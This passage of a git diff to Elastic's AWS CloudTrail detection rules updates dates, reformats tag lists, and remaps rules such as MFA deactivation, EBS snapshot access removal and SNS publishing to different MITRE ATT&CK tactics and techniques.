Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Tactic: Impact", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -125,22 +118,21 @@ event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.acti [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml b/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml index 1221591ba53..6bc872fe7e4 100644 --- a/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml +++ b/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/02" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -116,22 +116,16 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml index 2a685166ca7..47d2cd2bd7c 100644 --- a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml +++ b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/26" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -93,16 +93,7 @@ references = [ risk_score = 47 rule_id = "d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS CloudTrail", - "Data Source: AWS IAM", - "Resources: Investigation Guide", - "Tactic: Impact", - "Tactic: Persistence", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS CloudTrail", "Data Source: AWS IAM", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -116,34 +107,39 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1531" -name = "Account Access Removal" -reference = "https://attack.mitre.org/techniques/T1531/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml index d12ddb1dc74..3a697f610ce 100644 --- a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml +++ b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/28" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,15 +101,7 @@ references = [ risk_score = 47 rule_id = "f6652fb5-cd8e-499c-8311-2ce2bb6cac62" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS RDS", - "Resources: Investigation Guide", - "Use Case: Threat Detection", - "Tactic: Impact", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS RDS", "Resources: Investigation Guide", "Use Case: Threat Detection"] timestamp_override = "event.ingested" type = "eql" @@ -124,17 +116,16 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_rds_snapshot_deleted.toml b/rules/integrations/aws/impact_rds_snapshot_deleted.toml index 7e6e4313c9b..dfd3f15f6b9 100644 --- a/rules/integrations/aws/impact_rds_snapshot_deleted.toml +++ b/rules/integrations/aws/impact_rds_snapshot_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -154,17 +154,16 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml b/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml index 36ccc844da3..daebbd7abb6 100644 --- a/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml +++ b/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/17" integration = ["aws"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -148,18 +148,18 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/integrations/aws/initial_access_console_login_root.toml b/rules/integrations/aws/initial_access_console_login_root.toml index a8842b9754b..df37ae1e4e8 100644 --- a/rules/integrations/aws/initial_access_console_login_root.toml +++ b/rules/integrations/aws/initial_access_console_login_root.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/11" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,16 +95,7 @@ references = ["https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.htm risk_score = 47 rule_id = "e2a67480-3b79-403d-96e3-fdd2992c50ef" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Sign-In", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access", - "Tactic: Privilege Escalation", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Sign-In", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -133,10 +124,12 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" @@ -146,19 +139,3 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/aws/initial_access_password_recovery.toml b/rules/integrations/aws/initial_access_password_recovery.toml index 32b17765f99..2858c38caf0 100644 --- a/rules/integrations/aws/initial_access_password_recovery.toml +++ b/rules/integrations/aws/initial_access_password_recovery.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/02" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -123,16 +123,3 @@ field_names = [ "aws.cloudtrail.response_elements" ] -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml index 7a3ec1d8500..889051ca438 100644 --- a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml +++ b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,16 +67,7 @@ references = [ risk_score = 47 rule_id = "873b5452-074e-11ef-852e-f661ea17fbcc" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -106,36 +97,18 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.004" name = "SSH Authorized Keys" reference = "https://attack.mitre.org/techniques/T1098/004/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml index e8de6075067..ffdeb1c355e 100644 --- a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml +++ b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -97,19 +97,7 @@ references = [ risk_score = 73 rule_id = "d1e5e410-3e34-412e-9b1f-dd500b3b55cd" severity = "high" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Data Source: AWS STS", - "Data Source: AWS Sign-In", - "Use Case: Identity and Access Audit", - "Tactic: Lateral Movement", - "Tactic: Credential Access", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Data Source: AWS STS", "Data Source: AWS Sign-In", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -125,66 +113,39 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.007" -name = "Cloud Services" -reference = "https://attack.mitre.org/techniques/T1021/007/" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" -[[rule.threat.technique.subtechnique]] -id = "T1552.005" -name = "Cloud Instance Metadata API" -reference = "https://attack.mitre.org/techniques/T1552/005/" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.007" +name = "Cloud Services" +reference = "https://attack.mitre.org/techniques/T1021/007/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml index 2cb48308925..25f18611e04 100644 --- a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml +++ b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["aws"] maturity = "production" -updated_date = "2025/09/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,17 +98,7 @@ risk_score = 47 rule_id = "2112ecce-cd34-11ef-873f-f661ea17fbcd" setup = "AWS SNS topic data event types need to be enabled in the CloudTrail trail configuration to capture the Publish action. Ensure that the AWS CloudTrail service is [configured](https://docs.aws.amazon.com/sns/latest/dg/logging-using-cloudtrail.html#cloudtrail-data-events) to log data events for SNS." severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS SNS", - "Use Case: Threat Detection", - "Resources: Investigation Guide", - "Tactic: Lateral Movement", - "Tactic: Exfiltration", - "Tactic: Impact", -] +tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SNS", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -140,46 +130,16 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1534" -name = "Internal Spearphishing" -reference = "https://attack.mitre.org/techniques/T1534/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1496" -name = "Resource Hijacking" -reference = "https://attack.mitre.org/techniques/T1496/" -[[rule.threat.technique.subtechnique]] -id = "T1496.004" -name = "Cloud Service Hijacking" -reference = "https://attack.mitre.org/techniques/T1496/004/" - - - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name", "aws.cloudtrail.resources.arn"] diff --git a/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml b/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml index 1fb11e95294..4d5ee39cd2f 100644 --- a/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml +++ b/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -112,37 +112,3 @@ tags = [ ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat.technique]] -id = "T1526" -name = "Cloud Service Discovery" -reference = "https://attack.mitre.org/techniques/T1526/" - -[[rule.threat.technique]] -id = "T1580" -name = "Cloud Infrastructure Discovery" -reference = "https://attack.mitre.org/techniques/T1580/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml b/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml index f428b4da9a8..9f64ead7e86 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -114,61 +114,3 @@ tags = [ ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat.technique]] -id = "T1526" -name = "Cloud Service Discovery" -reference = "https://attack.mitre.org/techniques/T1526/" - -[[rule.threat.technique]] -id = "T1580" -name = "Cloud Infrastructure Discovery" -reference = "https://attack.mitre.org/techniques/T1580/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml index 2634447e6ad..7093cd7002b 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -106,24 +106,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "809b70d3-e2c3-455e-af1b-2626a5a1a276" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -134,3 +122,7 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml index c961ff23bf9..149e4f75951 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -106,24 +106,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "dca28dee-c999-400f-b640-50a081cc0fd1" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -134,3 +122,7 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml index db71d8487f4..e5d2305511a 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -104,24 +104,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -132,42 +120,7 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.007" -name = "Cloud Services" -reference = "https://attack.mitre.org/techniques/T1021/007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml b/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml index c81083059cd..f3eb07c91ed 100644 --- a/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml +++ b/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml @@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/02/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -121,32 +121,21 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" - - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml index 37786c113df..cd06e93a54e 100644 --- a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml +++ b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/04" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,16 +63,7 @@ references = [ risk_score = 21 rule_id = "39144f38-5284-4f8e-a2ae-e3fd628d90b0" severity = "low" -tags = [ - "Domain: 